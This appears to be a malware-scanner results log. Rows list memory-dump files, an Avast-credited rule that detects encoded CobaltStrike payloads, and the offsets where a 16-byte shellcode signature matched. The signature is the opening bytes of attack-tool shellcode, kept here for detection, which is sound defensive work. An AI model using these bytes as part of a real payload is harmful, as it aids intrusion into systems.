00000019.00000003.506426333.000000000626E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x16e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3af8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5f10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8328:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa740:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcb58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xef70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11388:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x137b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15bd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18000:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a428:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c850:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ec78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x210b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x234e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25920:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27d58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a190:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c5d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ea20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500371775.0000000006DEB000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x15a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509507876.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2210:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3b68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568633989.0000000006E16000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x438:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500271247.0000000006E01000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1e48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509762082.0000000005B40000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568691207.0000000006E29000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507305461.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xa38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2af0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4ba8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6c60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8d28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xadf0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdec0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xff88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12050:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14118:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x161e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x182b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a390:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c468:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e540:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20618:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22700:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x247e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x268d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x289b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2aaa0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500574937.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2ec0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500300611.0000000006DF8000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1390:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500381322.0000000006DE8000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1238:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499851554.0000000006E57000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x538:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568719259.0000000006E33000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x770:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3b78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.504543226.0000000006527000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xbc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5b90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8388:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xab80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd378:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfb70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12378:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14b80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17388:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19b90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c398:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ebb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x213c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23be0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x263f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28c10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2b438:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2dc60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30488:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x32cb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.569049205.0000000006E9D000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2878:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5d50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9238:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc720:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfc08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13100:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499716165.0000000006E6A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xef8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.506765353.0000000006170000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xd58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3010:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x52c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7580:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9838:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbb00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xddc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10090:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12358:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14620:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x168f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18bd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1aea8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d180:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.506625375.00000000061EF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1078:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5768:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7ae0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9e58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc1e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe568:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x108f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12c78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15000:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17388:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19720:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1bab8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1de50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x201e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22580:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24928:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26cd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29078:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2b420:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d7c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509636935.0000000005B40000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508201854.0000000005DC2000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4670:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6408:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x81b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9f58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbd00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdaa8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf850:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x115f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x133b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15168:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16f20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18cd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1aa90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c848:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e610:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x203d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x221a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23f68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25d30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.501854915.0000000006980000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xe18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3b30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6848:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9560:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc278:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xef90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11cb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x149e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17708:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a430:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d158:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1fe80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22bb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x258f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28628:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2b360:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2e098:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30dd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33b08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x36850:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x39598:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499572225.0000000006E8B000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xbf8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500537921.0000000006DCC000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x4f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500290954.0000000006DFB000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1718:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509363516.0000000005B41000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x14c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2e18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4770:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x60c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7a30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9398:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xad00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc668:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdfd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf948:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x112c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12c38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x145b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15f28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x178a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19228:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1abb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c538:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1dec0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f848:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x211e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499838198.0000000006E5A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x980:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499586408.0000000006E87000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1750:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509707518.0000000005B40000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508774998.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1588:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4c58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x67d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8348:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9ec0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xba38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd5b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf128:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10cb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12838:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x143c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15f48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17ad0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19668:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b200:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cd98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e930:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x204c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22070:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23c18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.504055585.00000000065C0000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xf08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x37c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6078:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8940:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb208:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdad0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10398:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12c70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15548:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17e20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a6f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cfe0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f8c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x221b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24a98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27380:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29c68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c560:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ee58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31750:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34048:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
